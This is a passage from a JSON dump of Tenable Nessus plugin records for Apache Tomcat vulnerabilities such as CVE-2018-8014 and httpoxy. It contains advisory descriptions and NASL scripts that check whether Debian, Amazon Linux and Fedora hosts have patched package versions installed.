Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-08-14T00:00:00", "type": "nessus", "title": "Debian DLA-1883-1 : tomcat8 security update (httpoxy)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5388", "CVE-2018-8014", "CVE-2019-0221"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libservlet3.1-java", "p-cpe:/a:debian:debian_linux:libservlet3.1-java-doc", "p-cpe:/a:debian:debian_linux:libtomcat8-java", "p-cpe:/a:debian:debian_linux:tomcat8", "p-cpe:/a:debian:debian_linux:tomcat8-admin", "p-cpe:/a:debian:debian_linux:tomcat8-common", "p-cpe:/a:debian:debian_linux:tomcat8-docs", "p-cpe:/a:debian:debian_linux:tomcat8-examples", "p-cpe:/a:debian:debian_linux:tomcat8-user", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1883.NASL", "href": "https://www.tenable.com/plugins/nessus/127865", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1883-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127865);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2016-5388\", \"CVE-2018-8014\", \"CVE-2019-0221\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Debian DLA-1883-1 : tomcat8 security update (httpoxy)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Several minor issues have been fixed in tomcat8, a Java Servlet and\nJSP engine.\n\nCVE-2016-5388\n\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 3875\nsection 4.1.18 and therefore does not protect applications from the\npresence of untrusted client data in the HTTP_PROXY environment\nvariable, which might allow remote attackers to redirect an\napplication's outbound HTTP traffic to an arbitrary proxy server via a\ncrafted Proxy header in an HTTP request, aka an 'httpoxy' issue. The\n'cgi' servlet now has a 'envHttpHeaders' parameter to filter\nenvironment variables.\n\nCVE-2018-8014\n\nThe defaults settings for the CORS filter provided in Apache Tomcat\nare insecure and enable 'supportsCredentials' for all origins. It is\nexpected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue.\n\nCVE-2019-0221\n\nThe SSI printenv command in Apache Tomcat echoes user provided data\nwithout escaping and is, therefore, vulnerable to XSS. SSI is disabled\nby default. 
The printenv command is intended for debugging and is\nunlikely to be present in a production website.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/tomcat8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.1-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.1-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat8-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat8-java\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-admin\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-common\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif 
(deb_check(release:\"8.0\", prefix:\"tomcat8-docs\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-examples\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-user\", reference:\"8.0.14-1+deb8u15\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:33", "description": "The default settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\nAn improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. (CVE-2018-1336)\n\nThe host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. 
Versions Affected: Apache Tomcat 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.(CVE-2018-8034)", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat7 / tomcat80 (ALAS-2018-1055)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2018-08-31T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7-log4j", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-webapps", "p-cpe:/a:amazon:linux:tomcat80", "p-cpe:/a:amazon:linux:tomcat80-admin-webapps", "p-cpe:/a:amazon:linux:tomcat80-docs-webapp", "p-cpe:/a:amazon:linux:tomcat80-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat80-javadoc", "p-cpe:/a:amazon:linux:tomcat80-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat80-lib", "p-cpe:/a:amazon:linux:tomcat80-log4j", "p-cpe:/a:amazon:linux:tomcat80-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat80-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-1055.NASL", "href": "https://www.tenable.com/plugins/nessus/111610", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-1055.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111610);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/08/31 12:25:01\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\");\n script_xref(name:\"ALAS\", value:\"2018-1055\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 / tomcat80 (ALAS-2018-1055)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The defaults settings for the CORS filter provided in Apache Tomcat\nare insecure and enable 'supportsCredentials' for all origins. It is\nexpected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue.(CVE-2018-8014)\n\nAn improper handing of overflow in the UTF-8 decoder with\nsupplementary characters can lead to an infinite loop in the decoder\ncausing a Denial of Service. Versions Affected: Apache Tomcat\n8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. (CVE-2018-1336)\n\nThe host name verification when using TLS with the WebSocket client\nwas missing. It is now enabled by default. Versions Affected: Apache\nTomcat 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.(CVE-2018-8034)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-1055.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update tomcat7' to update your system.\n\nRun 'yum update tomcat80' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-log4j-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-8.0.53-1.80.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"tomcat80-admin-webapps-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-docs-webapp-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-el-3.0-api-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-javadoc-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-jsp-2.3-api-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-lib-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-log4j-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-servlet-3.1-api-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-webapps-8.0.53-1.80.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:11:38", "description": "The version of Apache Tomcat installed on the remote host is 9.0.x prior to 9.0.10. It is, therefore, affected by multiple vulnerabilities.\n\n - A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.9 due to insecure default settings for the CORS filter (CVE-2018-8014).\n\n - A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.10. Hostname validation was not enabled by default when using TLS with the WebSocket client (CVE-2018-8034).\n\n - An information disclosure vulnerability exists in Apache Tomcat prior to version 9.0.10 due to a race condition. 
If an async request was completed by the application at the same time as the container triggered the async timeout, this could lead to a user being sent the response of another user. (CVE-2018-8037)", "cvss3": {}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.x < 9.0.10 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2019-05-13T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700708.PASL", "href": "https://www.tenable.com/plugins/nnm/700708", "sourceData": "Binary data 700708.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:15:37", "description": "The version of Apache Tomcat installed on the remote host is 9.0.x prior to 9.0.10. It is, therefore, affected by multiple vulnerabilities:\n\n - A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.9 due to insecure default settings for the CORS filter (CVE-2018-8014).\n\n - A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.10. Hostname validation was not enabled by default when using TLS with the WebSocket client (CVE-2018-8034).\n\n - An information disclosure vulnerability exists in Apache Tomcat prior to version 9.0.10 due to a race condition. If an async request was completed by the application at the same time as the container triggered the async timeout, this could lead to a user being sent the response of another user. 
(CVE-2018-8037).", "cvss3": {}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.x < 9.0.10 Security Misconfiguration", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2019-05-13T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700707.PASL", "href": "https://www.tenable.com/plugins/nnm/700707", "sourceData": "Binary data 700707.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:24:27", "description": "The version of Apache Tomcat installed on the remote host is version 8.5.x prior to 8.5.32. It is, therefore, affected by multiple vulnerabilities :\n\n - The defaults settings for the CORS filter are insecure and enable supportsCredentials for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n - The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. (CVE-2018-8034)\n - If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. 
(CVE-2018-8037)", "cvss3": {}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.5.x < 8.5.32 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2019-05-13T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700695.PASL", "href": "https://www.tenable.com/plugins/nnm/700695", "sourceData": "Binary data 700695.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:22", "description": "This update includes a rebase from 8.5.30 up to 8.5.32 which resolves two CVEs along with various other bugs/features :\n\n - rhbz#1579612 CVE-2018-8014 tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins\n\n - rhbz#1607586 CVE-2018-8034 tomcat: host name verification missing in WebSocket client\n\n - rhbz#1607584 CVE-2018-8037 tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : 1:tomcat (2018-b1832101b8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:tomcat", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-B1832101B8.NASL", "href": "https://www.tenable.com/plugins/nessus/120717", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-b1832101b8.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n 
script_id(120717);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_xref(name:\"FEDORA\", value:\"2018-b1832101b8\");\n\n script_name(english:\"Fedora 28 : 1:tomcat (2018-b1832101b8)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes a rebase from 8.5.30 up to 8.5.32 which resolves\ntwo CVEs along with various other bugs/features :\n\n - rhbz#1579612 CVE-2018-8014 tomcat: Insecure defaults in\n CORS filter enable 'supportsCredentials' for all origins\n\n - rhbz#1607586 CVE-2018-8034 tomcat: host name\n verification missing in WebSocket client\n\n - rhbz#1607584 CVE-2018-8037 tomcat: Due to a mishandling\n of close in NIO/NIO2 connectors user sessions can get\n mixed up\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-b1832101b8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:tomcat package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"tomcat-8.5.32-1.fc28\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:tomcat\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:55:21", "description": "The version of Apache Tomcat installed on the remote host is 9.0.x prior to 9.0.10. It is, therefore, affected by multiple vulnerabilities.\n A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.9 due to insecure default settings for the CORS filter (CVE-2018-8014).\n A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.10. Hostname validation was not enabled by default when using TLS with the WebSocket client (CVE-2018-8034).\n\n An information disclosure vulnerability exists in Apache Tomcat prior to version 9.0.10 due to a race condition. 
If an async request was completed by the application at the same time as the container triggered the async timeout, this could lead to a user being sent the response of another user (CVE-2018-8037).", "cvss3": {}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.0 < 9.0.10 Multiple Vulnerabilites", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_9_0_9.NASL", "href": "https://www.tenable.com/plugins/nessus/111069", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111069);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2018-8014\");\n script_bugtraq_id(104203, 104894, 104895);\n\n script_name(english:\"Apache Tomcat 9.0.0 < 9.0.10 Multiple Vulnerabilites\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 9.0.x\nprior to 9.0.10. It is, therefore, affected by multiple \nvulnerabilities.\n A security misconfiguration vulnerability exists in Apache Tomcat\n prior to version 9.0.9 due to insecure default settings for the \n CORS filter (CVE-2018-8014).\n \n A security misconfiguration vulnerability exists in Apache 